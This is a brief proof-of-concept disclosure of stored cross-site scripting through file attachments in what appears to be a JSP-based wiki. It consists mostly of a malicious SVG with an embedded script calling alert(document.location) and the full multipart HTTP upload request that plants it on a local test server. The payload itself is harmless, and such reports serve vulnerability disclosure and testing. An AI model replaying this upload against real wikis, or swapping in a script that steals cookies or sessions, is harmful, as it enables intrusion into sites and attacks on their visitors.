XSS via upload attachment

// <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>

POST /wiki_jsp_war/attach?progressid=be2d8a23-26ca-4652-ad43-ba7983bf2aa8 HTTP/1.1
Host: localhost:8081
...
-----------------------------308155045040371725912594659801
Content-Disposition: form-data; name="nextpage"/wiki_jsp_war/Upload.jsp?page=LeftMenuFooter
-----------------------------308155045040371725912594659801
Content-Disposition: form-data; name="page"LeftMenuFooter
-----------------------------308155045040371725912594659801
Content-Disposition: form-data; name="action"upload
-----------------------------308155045040371725912594659801
Content-Disposition: form-data; name="kj2ztmbp"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>
-----------------------------308155045040371725912594659801
Content-Disposition: form-data; name="changenote"
-----------------------------308155045040371725912594659801
Content-Disposition: form-data; name="upload"Upload
-----------------------------308155045040371725912594659801--